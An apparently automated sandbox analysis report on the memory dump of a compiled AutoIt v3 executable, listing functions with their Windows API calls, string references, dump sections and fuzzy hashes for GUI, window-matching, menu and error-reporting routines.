Opcode Fuzzy Hash: aec66712e738298caa7b80cea9b057916d77a34dc4c849947a928dd03e19aac5
Instruction Fuzzy Hash: 9B613871700212B6DA21BF219D82FBB3358AF05345F54413BBC05B71C2EBACDA02D6AD

Uniqueness

Uniqueness Score: -1.00%

Function 004048C8, Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00404956
DeleteObject.GDI32(00000000), ref: 00404998
DeleteObject.GDI32(00000000), ref: 004049A3
DestroyCursor.USER32(00000000), ref: 004049AE
DestroyWindow.USER32(00000000), ref: 004049B9
SendMessageW.USER32(?,00001308,?,00000000), ref: 0047E179
703AB9D0.COMCTL32(?,000000FF,?), ref: 0047E1B2
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0047E5E0

Part of subcall function 004049CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00404954,00000000), ref: 00404A23

SendMessageW.USER32 ref: 0047E627
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0047E63E

Strings

0, xrefs: 0047E474

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: DestroyMessageSendWindow$DeleteObject$CursorInvalidateMoveRect
String ID: 0
API String ID: 485803963-4108050209
Opcode ID: f805f665687708dabba5ac7da74a1df1eb7af4a17382189be8790def8c0a2729
Instruction ID: 92f0cdbb7cfa30595f06fac0b206f52fd519c4eb6519070f6595a6d66aa14044
Opcode Fuzzy Hash: f805f665687708dabba5ac7da74a1df1eb7af4a17382189be8790def8c0a2729
Instruction Fuzzy Hash: 4612A370500201DFDB20DF25C884BAABBE5BF49304F5486BEE559DB292C739EC46CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0046D385, Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0046D3BE
SetTextColor.GDI32(?,?), ref: 0046D3C2
GetSysColorBrush.USER32(0000000F), ref: 0046D3D8
GetSysColor.USER32(0000000F), ref: 0046D3E3
CreateSolidBrush.GDI32(?), ref: 0046D3E8
GetSysColor.USER32(00000011), ref: 0046D400
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0046D40E
SelectObject.GDI32(?,00000000), ref: 0046D41F
SetBkColor.GDI32(?,00000000), ref: 0046D428
SelectObject.GDI32(?,?), ref: 0046D435
InflateRect.USER32(?,000000FF,000000FF), ref: 0046D454
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0046D46B
GetWindowLongW.USER32(00000000,000000F0), ref: 0046D480
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0046D4A8
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0046D4CF
InflateRect.USER32(?,000000FD,000000FD), ref: 0046D4ED
DrawFocusRect.USER32(?,?), ref: 0046D4F8
GetSysColor.USER32(00000011), ref: 0046D506
SetTextColor.GDI32(?,00000000), ref: 0046D50E
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0046D522
SelectObject.GDI32(?,0046D0B5), ref: 0046D539
DeleteObject.GDI32(?), ref: 0046D544
SelectObject.GDI32(?,?), ref: 0046D54A
DeleteObject.GDI32(?), ref: 0046D54F
SetTextColor.GDI32(?,?), ref: 0046D555
SetBkColor.GDI32(?,?), ref: 0046D55F

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 9dbaec4b8ec6fbc4d86ac5bee3bd3e0c16aef7784aa94d905cc91c13ba97dfc4
Instruction ID: 2a18889e8fc235fcc4d7e982ef7184a3f2fc86c553b22fa0efe0aebde8f38c0b
Opcode Fuzzy Hash: 9dbaec4b8ec6fbc4d86ac5bee3bd3e0c16aef7784aa94d905cc91c13ba97dfc4
Instruction Fuzzy Hash: EC511B71D01218BFDF10AFA8DC48EAE7BB9FF48320F10452AF915AB2E1D77599409B54

Uniqueness

Uniqueness Score: -1.00%

Function 0041A756, Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 0042010A: _malloc.LIBCMT ref: 00420122

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0041A839
GetSystemMetrics.USER32(00000007), ref: 0041A841
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0041A86C
GetSystemMetrics.USER32(00000008), ref: 0041A874
GetSystemMetrics.USER32(00000004), ref: 0041A899
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0041A8B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0041A8C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0041A8F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0041A90D
GetClientRect.USER32(00000000,000000FF), ref: 0041A92B
GetStockObject.GDI32(00000011), ref: 0041A947
SendMessageW.USER32(00000000,00000030,00000000), ref: 0041A952

Part of subcall function 0041B736: GetCursorPos.USER32(000000FF), ref: 0041B749
Part of subcall function 0041B736: ScreenToClient.USER32(00000000,000000FF), ref: 0041B766
Part of subcall function 0041B736: GetAsyncKeyState.USER32(00000001), ref: 0041B78B
Part of subcall function 0041B736: GetAsyncKeyState.USER32(00000002), ref: 0041B799

SetTimer.USER32(00000000,00000000,00000028,0041ACEE), ref: 0041A979

Strings

AutoIt v3 GUI, xrefs: 0041A8F1

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer_malloc
String ID: AutoIt v3 GUI
API String ID: 1557154100-248962490
Opcode ID: 2f1d2299fed8516f611ff9b4c12633793756a6c04425ce7dc5e870ae986286c3
Instruction ID: c5bd50e74ed48a7428a71b377768ed050aef438c68b484b57b91589d4a3b9e20
Opcode Fuzzy Hash: 2f1d2299fed8516f611ff9b4c12633793756a6c04425ce7dc5e870ae986286c3
Instruction Fuzzy Hash: B5B16E71A0120AAFDB14EF69CC45BEE7BB4BB08314F11462AFA15A72E0D738D851CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401F04, Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON

Download Yara Rule

APIs

Part of subcall function 00407E53: _memmove.LIBCMT ref: 00407EB9

GetForegroundWindow.USER32 ref: 00401FBE
IsWindow.USER32(?), ref: 0047282E

Strings

ALL, xrefs: 00472795
HANDLE, xrefs: 00472613
ACTIVE, xrefs: 004725FD
CLASS, xrefs: 00472659
INSTANCE, xrefs: 0047276D
LAST, xrefs: 004725E7
TITLE, xrefs: 004727C3
REGEXPTITLE, xrefs: 00472629
REGEXPCLASS, xrefs: 0047267A

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: 729ffbc808c10173d089038917d9a6f188dca6d3f27299e754c2503d34157a82
Instruction ID: 6c55151245db5c530313bbddb579d76436cfbc951a4748af10f36d4bb411270e
Opcode Fuzzy Hash: 729ffbc808c10173d089038917d9a6f188dca6d3f27299e754c2503d34157a82
Instruction Fuzzy Hash: AFD10C30504602DBCB04FF11C680ADAB7A0BF54344F148A2FF459672A1CB79E95ACBAB

Uniqueness

Uniqueness Score: -1.00%

Function 0043E4EA, Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0043E549

Strings

ALL, xrefs: 0043E5DD
ACTIVE, xrefs: 0043E524
[ALL, xrefs: 0043E5EF
HANDLE=, xrefs: 0043E542
[REGEXPTITLE:, xrefs: 0043E571
REGEXP=, xrefs: 0043E55E
LAST, xrefs: 0043E50E
[CLASS:, xrefs: 0043E599
[HANDLE:, xrefs: 0043E555
CLASSNAME=, xrefs: 0043E586
[LAST, xrefs: 0043E5F6
[ACTIVE, xrefs: 0043E536

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 327401fee459a3d44ea5b8fadb4d883930952a71245e866fe7fb4c460d35dfd7
Instruction ID: 0c455dec74f35219d1f73ecd3cc9c7c6dd8b5d7fba7d4f7f3b6b33447ea7b4fc
Opcode Fuzzy Hash: 327401fee459a3d44ea5b8fadb4d883930952a71245e866fe7fb4c460d35dfd7
Instruction Fuzzy Hash: DC31AB31A49209BADA14EB92DE03FEE77B45F24708F70042BB451710E5EBAD6F04866E

Uniqueness

Uniqueness Score: -1.00%

Function 0044B428, Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 0044B46D
VariantCopy.OLEAUT32(?,?), ref: 0044B476
VariantClear.OLEAUT32(?), ref: 0044B482
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0044B561
__swprintf.LIBCMT ref: 0044B591
VarR8FromDec.OLEAUT32(?,?), ref: 0044B5BD
VariantInit.OLEAUT32(?), ref: 0044B63F
SysFreeString.OLEAUT32(00000016), ref: 0044B6D1
VariantClear.OLEAUT32(?), ref: 0044B727
VariantClear.OLEAUT32(?), ref: 0044B736
VariantInit.OLEAUT32(00000000), ref: 0044B772

Strings

Default, xrefs: 0044B615
%4d%02d%02d%02d%02d%02d, xrefs: 0044B58B

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 2c194114c1fe75af332b9c6f3dd8b535fa746269ede29926c0e30f2830d32f8f
Instruction ID: e456309ace848fdf1ec812e71b8bfdfaafa8df2c5e40edfdb513336f09d57177
Opcode Fuzzy Hash: 2c194114c1fe75af332b9c6f3dd8b535fa746269ede29926c0e30f2830d32f8f
Instruction Fuzzy Hash: 5BC1F431A00615EBEB10DF66D884B6AB7B5FF05700F14846BE4059B292CB7CEC51DBEA

Uniqueness

Uniqueness Score: -1.00%

Function 00443110, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00474085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00443145
LoadStringW.USER32(00000000,?,00474085,00000016), ref: 0044314E

Part of subcall function 0040CAEE: _memmove.LIBCMT ref: 0040CB2F

GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00474085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00443170
LoadStringW.USER32(00000000,?,00474085,00000016), ref: 00443173
__swprintf.LIBCMT ref: 004431B3
__swprintf.LIBCMT ref: 004431C5
_wprintf.LIBCMT ref: 0044326C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00443283

Strings

Line %d:, xrefs: 004431AD
^ ERROR, xrefs: 00443216
%s (%d) : ==> %s: %s %s, xrefs: 00443267
Line %d (File "%s"):, xrefs: 004431BF
Error: , xrefs: 0044323C

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 5ede4ec33c20ebc3562c4763fd39157812e50187bc5edc2acfc3f0f0b3154786
Instruction ID: a492619171314c1ef465e132f185e08f43f705e884f85adb5d22e9157e8efad0
Opcode Fuzzy Hash: 5ede4ec33c20ebc3562c4763fd39157812e50187bc5edc2acfc3f0f0b3154786
Instruction Fuzzy Hash: 7E414171900218A6DB04FFE2DD86EDF7778AF14706F50047BB601B20D1DAB96F04CA69

Uniqueness

Uniqueness Score: -1.00%

Function 004432B0, Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00473C64,00000010,00000000,Bad directive syntax error,0049DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 004432D1
LoadStringW.USER32(00000000,?,00473C64,00000010), ref: 004432D8

Part of subcall function 0040CAEE: _memmove.LIBCMT ref: 0040CB2F

_wprintf.LIBCMT ref: 00443309
__swprintf.LIBCMT ref: 0044332B
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00443395

Strings

., xrefs: 0044337B
Error: , xrefs: 00443363
Line %d:, xrefs: 00443325
%s (%d) : ==> %s.: %s %s, xrefs: 00443304
"L, xrefs: 00443338, 00443322, 004432FE
Line %d (File "%s"):, xrefs: 0044333B

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"L
API String ID: 1506413516-3963999830
Opcode ID: 3273c7ca2acece8b07de71d62e504e05192df4f9d59ffe087fdfdcb2f103b412
Instruction ID: 9dc12edb2ca86512bfbc399ae09126ff7e992dda4ac8a5d74f2ef7ee21d27bbd
Opcode Fuzzy Hash: 3273c7ca2acece8b07de71d62e504e05192df4f9d59ffe087fdfdcb2f103b412
Instruction Fuzzy Hash: C4218031940219FBDF01EF91CC0AEEE7B79BF14705F00446BB905B10E1DA79AA54DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00445FDB, Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00445FF5
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00446082
GetMenuItemCount.USER32(004C18F0), ref: 0044610B
DeleteMenu.USER32(004C18F0,00000005,00000000,000000F5,?,?), ref: 0044619B
DeleteMenu.USER32(004C18F0,00000004,00000000), ref: 004461A3
DeleteMenu.USER32(004C18F0,00000006,00000000), ref: 004461AB
DeleteMenu.USER32(004C18F0,00000003,00000000), ref: 004461B3
GetMenuItemCount.USER32(004C18F0), ref: 004461BB
SetMenuItemInfoW.USER32(004C18F0,00000004,00000000,00000030), ref: 004461F1
GetCursorPos.USER32(?), ref: 004461FB
SetForegroundWindow.USER32(00000000), ref: 00446204
TrackPopupMenuEx.USER32(004C18F0,00000000,?,00000000,00000000,00000000), ref: 00446217
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00446223

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 7464ab70255418f4a06b3aac00d5064425633eeb273d8ab896f5d892e439d3f2
Instruction ID: caef8a00015a64f5feaaeaf237578fbbe5c1d6a0bd04bf387388711d46625ac4
Opcode Fuzzy Hash: 7464ab70255418f4a06b3aac00d5064425633eeb273d8ab896f5d892e439d3f2
Instruction Fuzzy Hash: E871E470601215BBFB20DB55DC45FABBF64FF02368F14421BF6146A2E1C7B96850CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0044D520, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 0044D567

Part of subcall function 0040CAEE: _memmove.LIBCMT ref: 0040CB2F

LoadStringW.USER32(?,?,00000FFF,?), ref: 0044D589
__swprintf.LIBCMT ref: 0044D5DC
_wprintf.LIBCMT ref: 0044D68D
_wprintf.LIBCMT ref: 0044D6AB

Strings

^ ERROR, xrefs: 0044D631
"%s" (%d) : ==> %s:%s%s, xrefs: 0044D688
"%s" (%d) : ==> %s:, xrefs: 0044D6A6
Line %d (File "%s"):, xrefs: 0044D5D6
Error: , xrefs: 0044D657

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: LoadString_wprintf$__swprintf_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2116804098-2391861430
Opcode ID: ce4037db22bce18333c6ee7fa4fa48a2db2c754f895ad16bf21cb82f9dfca5b8
Instruction ID: 5ae465d2efccaff11473bada85243bfb4d72690504adf51d896e9d5c8c058e0d
Opcode Fuzzy Hash: ce4037db22bce18333c6ee7fa4fa48a2db2c754f895ad16bf21cb82f9dfca5b8
Instruction Fuzzy Hash: 6D51AF71D00109BADB05EBA2CD42EEFB778AF04705F10407BF505B21A1EA796F48DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0044D338, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0044D37F

Part of subcall function 0040CAEE: _memmove.LIBCMT ref: 0040CB2F

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0044D3A0
__swprintf.LIBCMT ref: 0044D3F3
_wprintf.LIBCMT ref: 0044D499
_wprintf.LIBCMT ref: 0044D4B7

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 0044D494
^ ERROR , xrefs: 0044D432
"%s" (%d) : ==> %s:, xrefs: 0044D4B2
Line %d (File "%s"):, xrefs: 0044D3ED
Error: , xrefs: 0044D463

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: LoadString_wprintf$__swprintf_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2116804098-3420473620
Opcode ID: 5e81282aaada284a0d40c758ddeea35646d8c348b14f032a71c8790a2788ef3f
Instruction ID: 6f1dbd9b7b947aeec825c0b8f9f24406a40744b7ced1ca9193f1c95e373375e0
Opcode Fuzzy Hash: 5e81282aaada284a0d40c758ddeea35646d8c348b14f032a71c8790a2788ef3f
Instruction Fuzzy Hash: 7551A271D00108BADB15EFA2CD42EEFB778AF14705F10447BB105B20A1DA796F58DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041B039, Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 0041B155: GetWindowLongW.USER32(?,000000EB), ref: 0041B166

GetSysColor.USER32(0000000F), ref: 0041B067

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 590ba1e5be8788f379ea43d38dd36aa064f2453d89deae306370efffa799a7ed
Instruction ID: f6a86a5b9c9589a78a0c2e0b0200aded12d7309b3d04cca3e63ab48fd841f64f
Opcode Fuzzy Hash: 590ba1e5be8788f379ea43d38dd36aa064f2453d89deae306370efffa799a7ed
Instruction Fuzzy Hash: 4841A731501540AFDB216F28D888BFA3B65EB0A770F144366FD758A2E2D7358C81D76E

Uniqueness

Uniqueness Score: -1.00%

Function 004084A6, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 004084E5
__itow.LIBCMT ref: 00408519

Part of subcall function 00422177: _xtow@16.LIBCMT ref: 00422198

Strings

0x%p, xrefs: 00475582
True, xrefs: 00475561
%.15g, xrefs: 004084DF
False, xrefs: 00475568

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: 34b79f5c1b4a8a53ab885a276e7b57e2b3cba2a17f6fb10cb003cf7b71cdc303
Instruction ID: 922f2c2aa89b35b23f73e2b7040a7f91240829397e7424e663e43ef1b880dbb9
Opcode Fuzzy Hash: 34b79f5c1b4a8a53ab885a276e7b57e2b3cba2a17f6fb10cb003cf7b71cdc303
Instruction Fuzzy Hash: 88412971600615EBDB24DF34D941FAA73E5FF44304F20446FE449EB2D2EA799A41CB19

Uniqueness

Uniqueness Score: -1.00%

Function 004457FB, Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00445816
GetMenuItemInfoW.USER32(004C18F0,000000FF,00000000,00000030), ref: 00445877
SetMenuItemInfoW.USER32(004C18F0,00000004,00000000,00000030), ref: 004458AD
Sleep.KERNEL32(000001F4), ref: 004458BF
GetMenuItemCount.USER32(?), ref: 00445903
GetMenuItemID.USER32(?,00000000), ref: 0044591F
GetMenuItemID.USER32(?,-00000001), ref: 00445949
GetMenuItemID.USER32(?,?), ref: 0044598E
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004459D4
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004459E8
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00445A09

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
